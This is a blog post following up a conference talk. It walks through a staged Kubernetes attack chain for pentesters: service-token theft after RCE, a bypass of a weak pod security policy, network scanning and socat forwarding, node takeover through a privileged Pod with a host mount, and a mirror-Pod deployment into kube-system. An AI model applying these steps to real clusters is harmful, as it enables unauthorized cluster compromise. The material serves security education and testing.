Saturday, I gave my talk titled “Command and KubeCTL: Real-World Kubernetes Security for Pentesters” at Shmoocon 2020. I’m following up with this post that goes into more details than I could cover in 50 minutes.
Here’s the important stuff:
This talk was designed to be a Kubernetes security talk for people doing offensive security or looking at Kubernetes security from the perspective of an attacker. This is demo-focused where much of the talk is one long demo showing an attack chain. The goal being I wanted something complicated and simple to exploit. I wanted things to not work initially and you had to figure out ways around them.
A few of my points:
The threats are what you make it The Kubernetes threat model is always up for interpretation by the deployer. I give examples of 3 completely differently configured environments that have different security expectations based on what are very common issues that we’ve identified while at NCC Group.
New tech, same security story Kubernetes is that new technology getting deployed faster than it’s getting secured and if the security industry wants to help the cause, we might need to update our tactics.
Real world demos for k8s should be non-linear I demo a real world(ish) attack chain that has a lot of steps to overcome. I want to show that it’s not just a single vulnerability that knocks the cluster over. There are things that need to by bypassed and subtle problems that come up.
There’s been talks on Kubernetes security before. Ian Coldwater and Duffie Coolie @ Blackhat laid the work on how we shouldn’t assume K8s is secure, Tim Allclair and Greg Castle @ Kubecon 2019 dove deeper into compromising actual workloads and issues with trying to segregate nodes. Brad Geesaman @ Kubecon 2017 talked about some of the ways to attack clusters. Just to name a few.
The demo is targeting a made up company that is trying to do per-namespace multi-tenancy. In short, the attack chain looks like this:
Each of the case studies in the talk were meant to show what happens after you compromise a Pod so the demo is started by finding a web service that has RCE in it to take over the Pod.
This was relatively straight forward to steal the service token in the default path except that I designed the Pod that you exploited to not run as root which meant that by default the Service Token wasn’t accessible. So I used the fsGroup feature which changes the ownership of the service token to the group I specified. I think this matches what we’d see in real world but I used it mostly to speed up taking over the service token.
I created a role in the cluster to expose the
Endpoints API so that I could make it easier for the demo. That’s because GKE
with an LB will have a different IP for the Kubernetes API and the exposed
service I created and I needed both. I think doing it this was is slightly better than sneaking
over to my
gcloud console and just asking what the IP is. In the real
world, you might not even have this problem if there’s a shared IP.
I wrote a script to speed up this process but it simply made a kubeconfig file that used the stolen service token. Mostly I wanted to make sure I wasn’t accidentally using the auto-updating gcloud kubeconfig file.
In my demo I used
kubectl auth can-i --list -n secure to see what I can do in the context of the “secure”
kubectl-access-matrix -n secure which is much cleaner output.
This step was mainly to point out that it appears as if we have full access
to our namespace.
This was a demo that showed something
kubectl run -it myshell --image=busybox -n secure to demonstrate that
while we saw there’s a Role granting full control over the namespace, there’s
still something preventing us from starting a new Pod. This was the PSP in the next step.
This was meant to demo what happens when you
have a seemingly simple PSP that has
MustRunAsNonRoot in it, but doesn’t
have a rule for
AllowPrivilegeEscalation=false. The second part is what
prevents the use of SETUID bits in binaries. So this demo was to run a Pod as
non-root, and then simply run
sudo. I neglected to explain this well enough
during my talk as someone mentioned after.
kubectl port-forward -n secure myspecialpod 8080 which connects me
into the custom image I
I tried to explain that it’s up to you if you want to tool up your custom
image that you’ve deployed, or just port-forward back out. I was doing port
forwarding mostly to show that this feature exists.
The next step was to find other Pods
in the cluster via
nmap -sS -p 5000 -n -PN -T5 --open 10.24.0.0/16 which is
obviously super specific and implies I already know the service I’m looking
nmap -AF 10.24.0.0/16 was going to take way to long otherwise.
This is again me attempting to get remote access into a Pod from my personal laptop. I like doing this because in a real assessment, all of my favorite tools are already on my system and if I was aiming to exploit it, I’d most likely do it this way. This runs something like:
kubectl run -n secure --image=alpine/socat socat -- -d -d tcp-listen:9999,fork,reuseaddr tcp-connect:10.24.2.3:5000
Run Socat in the namespace we’ve compromised, tell it to forward to the new service we’d like to compromise and don’t worry about what namespace it’s in.
My demo is showing another Pod in a different namespace that just happens to have the same RCE vulnerability as the first. Of course that’s unlikely but you can imagine 2 scenarios in the real world
First we’ve seen services that needs to be deployed into each namespace. Tiller is often deployed this way. So you compromise one namespace through the Tiller service and then go to a second namespace and find the exact same service that you can compromise there.
The second scenario is simply that you did in fact find another service and it’s not designed to be public facing because it has no authentication controls. Maybe this could be a Redis instance or some API endpoint that doesn’t need you to authenticate to it.
I’ve seen a lot of environments now that want to do namespace isolation at the network level. It’s possible but it’ll depend on what technology you use. Network Policies is likely the most Kubernetes native solution. But I see more solutions that are using Calico or Istio. There are lots of solutions including some cloud providers letting you set Pod isolation policies as native ACLs. This is a whole separate talk I think.
I’m simply stealing the Service Account token again, plugging it back into my kubeconfig file and showing that I can access a new namespace that has less restrictions (no PSP) than my own namespace. I now have access to the “Default” namespace.
One of the restrictions that get lifted in the “Default” namespace is that it allows you to run a privileged Pod. I think this is a real world scenario because we’re not seeing many group that block this yet. We all know it’s bad but there often ends up being some service that needs to be deployed privileged. This step deploys a privileged Pod into the “Default” namespace.
With my priviliged Pod I’m also sharing the host’s
process namespace and doing a host volume mount. I try to explain this in the
slides. The Nodes “/” is mounted into the containers “/chroot” directory.
Meaning if you look in “/chroot” you’ll see the Nodes file system. Then
chroot /chroot means that I take over the Node and can see
lots of different things.
This is the “… profit” phase. I didn’t include many slides about this because I wasn’t sure if I’d get enough time. I’m stealing information that happens to be on the GKE node and using it to further access the cluster. Then deploying a mirror Pod.
Now we’ve compromised the node. First I alias kubectl to speed things up
which is how GKE will be configured in an “UBUNTU” image. Then
to use the kubelet authentication token to access the cluster. The results I’m demonstrating here are that when I run
kubectl get po --all-namespaces
it shows me all Pods, deployments, services, etc. That’s another privilege escalation.
Then I show that running a command like
kubectl run shell --image=busybox -n kube-system will return a response saying that the
kubelet does not have permission to create a Pod in that namespace. This is where Mirror pods
or static Pods come in.
This step is directly thanks to the presentation from
Tim Allclair and Greg Castle that introduced me to Mirror pods. I’d recommend you go check out
their talk for deeper detail there. In short, you can put a yaml file in the
/etc/kubernetes/manifests directory with a description of a Pod, and it will be
“mirrored” into the cluster. So I created a mirror Pod with my malicious
I then run
kubectl get po -n kube-system to confirm
that the Pod has been deployed and run it again with
-o yaml | grep podIP
to find out what IP it currently has.
Then I’m using the krew tool that I
wrote called net-forward to run
a command like this
kubectl-net_forward -i 10.23.2.2 -p 8080. This creates a
socat listener and a reverse proxy into that image that I just deployed. To be
honest, this step is mostly to demonstrate some of the nuances and weirdness of
escalating access within the cluster. I could have taken over other Nodes by
simply creating new privileged Pods over and over until they got deployed into
the other Nodes I wanted.
To defense from the specific attack chain I mentioned above, here’s some ideas:
Just a reminder that this is a demo and I’ve manufactured. I’m exploiting things that I’ve meant to exploit. This isn’t about CVE’s and 0days, it’s about methods and tactics for pentesters. This is all trying to make the points that the 3 companies I created have different interpretations of the security controls that Kubernetes can provide and that pentesting these environments are always different.